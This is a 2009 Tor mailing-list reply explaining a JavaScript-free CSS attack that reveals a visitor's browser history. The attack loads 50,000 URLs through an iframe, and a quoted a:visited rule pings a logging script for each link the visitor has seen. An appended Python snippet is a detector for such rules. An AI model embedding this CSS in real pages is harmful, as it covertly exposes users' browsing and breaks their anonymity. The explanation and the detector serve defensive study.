
RE: Stealing browser history without JavaScript




> Date: Sun, 14 Jun 2009 22:34:32 +0100
> From: my.green.lantern@xxxxxxxxxxxxxx
> To: or-talk@xxxxxxxxxxxxx
> Subject: Re: Stealing browser history without JavaScript

> > Matej Kovacic wrote:
> >

> > Seems to me it would have to have all websites known to man on the page it
> > loads. If it looks at "visited links" css on the page it loads it could
> > only look at websites on that page. It would have to store a lot of web
> > pages on that hidden i-frame to really compare. Unless you are looking to
> > see if a particular person visited a particular page doesn't seem like it
> > would do anyone much good.


There are 50000 URLs used: they are loaded into the Iframe 2000 at a time.
e.g. http://www.making-the-web.com/misc/sites-you-visit/nojs/base.php?sess=xxxxx&from=49000
But yes it would be more useful for breaking the anonymity of a particular person who you had a known unique URL for.

>
> Zinco wrote:
> In this IFrames exploit the test web page is said to have a css
> background image embedded in it. I can find no such image (background:
> #003399;).
> (See http://www.w3schools.com/css/pr_background.asp.)

The links each have their own style statement and a background called from log_base.php
e.g. #l49871 a:visited{background:url(log_base.php?id=49871&sess=xxxxx);}
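
Added example (not part of the original message, and not the test page's own code): a Python check that flags stylesheet rules of the kind quoted above, where a :visited selector carries a url() fetch, and groups the hits by endpoint. The sample stylesheet is constructed and the function names are hypothetical.

```python
import re

# Constructed sample stylesheet modelled on the rule quoted in the message;
# the first two rules are benign controls.
SAMPLE_CSS = """
a:visited { color: #609; }
#nav a:hover { background: url(img/hover.png); }
#l49871 a:visited{background:url(log_base.php?id=49871&sess=xxxxx);}
#l49872 a:visited , #x a:link { background-image : url( "log_base.php?id=49872&sess=xxxxx" ) }
"""

COMMENT = re.compile(r"/\*.*?\*/", re.S)
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")
URL = re.compile(r"url\(\s*['\"]?([^'\")]+?)['\"]?\s*\)", re.I)


def find_visited_fetches(css):
    """Return (selector, url) pairs where a :visited rule triggers a fetch."""
    findings = []
    css = COMMENT.sub("", css)
    for selectors, body in RULE.findall(css):
        urls = URL.findall(body)
        if not urls:
            continue
        # A rule may list several selectors; only the :visited ones matter.
        for selector in selectors.split(","):
            selector = selector.strip()
            if re.search(r":visited\b", selector, re.I):
                findings.extend((selector, u.strip()) for u in urls)
    return findings


def looks_like_bulk_probe(findings, threshold=2):
    """Count distinct :visited fetch URLs per endpoint (query string removed)."""
    endpoints = {}
    for _, url in findings:
        endpoints.setdefault(url.split("?", 1)[0], set()).add(url)
    return {ep: len(urls) for ep, urls in endpoints.items() if len(urls) >= threshold}


if __name__ == "__main__":
    hits = find_visited_fetches(SAMPLE_CSS)
    for selector, url in hits:
        print(f"{selector} -> {url}")
    print(looks_like_bulk_probe(hits))
```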


